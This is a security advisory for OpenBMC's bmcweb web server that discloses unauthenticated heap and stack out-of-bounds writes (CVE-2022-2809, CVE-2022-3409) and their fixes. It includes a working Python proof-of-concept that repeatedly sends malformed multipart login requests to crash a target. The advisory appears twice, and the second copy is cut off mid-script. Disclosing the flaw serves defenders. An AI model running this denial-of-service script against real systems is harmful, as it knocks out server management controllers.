Affected Product
Ecosystem: Other OpenBMC
Package name: bmcweb
Affected versions: 2.12 and earlier
Patched versions: 2.13
Severity
High 8.2
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
CWE
CWE-229: Improper Handling of Values
CWE-121: Stack-based Buffer Overflow
CWE-122: Heap-based Buffer Overflow
CVE identifiers
CVE-2022-2809
CVE-2022-3409
Credits
Jakub Rozanski, [email protected]>
Title
Unauthenticated out of bounds heap and stack writes in bmcweb
Description
When fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS.
Two vulnerabilities were identified and reported as CVE-2022-2809 & CVE-2022-3409.
Proof Of Concept
import socket
import ssl
import time
HOST = "" # PROVIDE HOSTNAME or IP ADDRESS OF TARGET BMCWEB
PORT = 443
length = 322
additional = ""
payload = """POST /login HTTP/1.1\r\nHost: :8080\r\nUser-Agent: curl/7.58.0\r\nAccept: /\r\nContent-Length: %s\r\nContent-Type: multipart/form-data; boundary=---------------------------d74496d66958873e\r\n\r\n-----------------------------d74496d66958873e\r\nt-DiPpcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccgccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc%s\r\n\r\n"""
if name == "main":
while(True):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
client = ssl.wrap_socket(client, cert_reqs=ssl.CERT_NONE)
client.connect((HOST, PORT))
toSend = payload % (str(length), additional)
print(toSend)
client.send(toSend.encode('utf-8'))
print(client.recv(4096))
client.close()
time.sleep(0.01)
length += 1
additional += "a"
Vulnerability Description
Denial of service.
Affected Release
OpenBMC 2.12 and earlier
Fixed in Release
OpenBMC 2.13
Mitigation
CVE-2022-2809, https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56796
CVE-2022-3409, https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56868
For more information
If you have any questions or comments about this advisory:
- Email us at openbmc-security at lists.ozlabs.org
jrozansk Analyst
Affected Product
Ecosystem: Other OpenBMC
Package name: bmcweb
Affected versions: 2.12 and earlier
Patched versions: 2.13
Severity
High 8.2
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
CWE
CWE-229: Improper Handling of Values
CWE-121: Stack-based Buffer Overflow
CWE-122: Heap-based Buffer Overflow
CVE identifiers
CVE-2022-2809
CVE-2022-3409
Credits
Jakub Rozanski, [email protected]>
Title
Unauthenticated out of bounds heap and stack writes in bmcweb
Description
When fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS.
Two vulnerabilities were identified and reported as CVE-2022-2809 & CVE-2022-3409.
Proof Of Concept
import socket
import ssl
import time
HOST = "" # PROVIDE HOSTNAME or IP ADDRESS OF TARGET BMCWEB
PORT = 443
length = 322
additional = ""
payload = """POST /login HTTP/1.1\r\nHost: :8080\r\nUser-Agent: curl/7.58.0\r\nAccept: /\r\nContent-Length: %s\r\nContent-Type: multipart/form-data; boundary=---------------------------d74496d66958873e\r\n\r\n-----------------------------d74496d66958873e\r\nt-DiPpcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccgccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc%s\r\n\r\n"""
if name == "main":
Vulnerability Description
Denial of service.
Affected Release
OpenBMC 2.12 and earlier
Fixed in Release
OpenBMC 2.13
Mitigation
CVE-2022-2809, https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56796
CVE-2022-3409, https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56868
For more information
If you have any questions or comments about this advisory: